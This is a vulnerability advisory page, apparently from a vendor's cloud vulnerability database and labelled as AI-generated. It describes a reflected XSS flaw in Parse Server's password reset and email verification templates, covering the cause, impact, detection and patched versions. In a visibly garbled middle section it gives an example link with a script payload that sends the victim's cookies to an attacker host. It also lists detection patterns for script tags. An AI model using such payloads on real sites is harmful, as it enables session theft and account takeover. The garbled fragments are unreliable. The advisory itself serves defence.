
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-68115 is a Reflected Cross-Site Scripting (XSS) vulnerability in Parse Server, an open-source Node.js backend platform, affecting its password reset and email verification HTML pages. The vulnerability stems from unescaped Mustache template variables (triple-brace {{{...}}} syntax) that allow user-controlled values to be injected into rendered HTML without sanitization. It affects all Parse Server versions prior to 8.6.1 and versions 9.0.0 through 9.1.0-alpha.2. Disclosed on December 16, 2025, it carries a CVSS v3.1 score of 6.1 (Medium) and a CVSS v4.0 score of 5.3 (Medium) (Github Advisory, Parse Server Advisory).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically the use of Mustache's unescaped triple-brace interpolation ({{{variable}}}) in six HTML template files for password reset and email verification flows. Parameters such as token, username, locale, appId, and publicServerUrl were inserted into form action URLs and hidden input values without HTML encoding, allowing an attacker to craft a malicious link containing script payloads in these parameters. The fix, implemented in pull requests #9985 and #9986, converted all affected template variables from triple-brace (unescaped) to double-brace ({{...}}) escaped syntax and added a new XSS protection test suite in spec/PagesRouter.spec.js (Parse Server PR #9985, Parse Server PR #9986). No privileges are required to exploit this vulnerability, but user interaction (a victim clicking a crafted link) is necessary (Github Advisory).
Successful exploitation allows an attacker to inject and execute arbitrary JavaScript in the browser of any user who clicks a maliciously crafted password reset or email verification link. This can result in session token theft, credential harvesting, unauthorized account takeover, and identity theft for affected users. The scope is changed (affecting the user's browser context beyond the vulnerable server), with low confidentiality and integrity impact on both the vulnerable and subsequent systems; availability is not impacted (Github Advisory, Parse Server Advisory).
There is no public proof-of-concept exploit code and no evidence of in-the-wild exploitation at this time (Github Advisory). The EPSS score is approximately 0.025% (7th percentile), indicating a low near-term exploitation probability. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported.
/apps/<appId>/request_password_reset or /apps/verify_email).token, username, or locale. For example: https://target.example.com/apps/verify_email?token=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>&appId=myApp.%3Cscript%3E, %3C, %3E, javascript:) in token, username, locale, or appId parameters; outbound connections from user browsers to unknown external domains shortly after visiting these pages./apps/<appId>/request_password_reset or /apps/verify_email with anomalous or oversized parameter values containing script tags or event handlers; repeated requests from the same IP with varying payload patterns.Upgrade Parse Server to version 8.6.1 (LTS branch) or 9.1.0-alpha.3 (or later stable 9.x release) to apply the fix, which escapes all user-controlled values inserted into HTML templates using Mustache's double-brace escaped syntax. No configuration-based workarounds are available for this vulnerability. Organizations should also implement a Content Security Policy (CSP) header on Parse Server deployments as a defense-in-depth measure, and monitor password reset and email verification flows for anomalous parameter values (Parse Server Advisory, Parse Server PR #9986).
The vulnerability was reported by security researcher yueyueL and coordinated by Parse Server maintainer mtrezza, who published the advisory and patches on December 14–16, 2025. The fix was released rapidly, with both the 8.6.1 LTS and 9.1.0-alpha.3 patches merged on December 14, 2025, the same day the issue was identified internally. No significant broader media coverage or notable community controversy has been observed beyond standard vulnerability database indexing (Parse Server Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."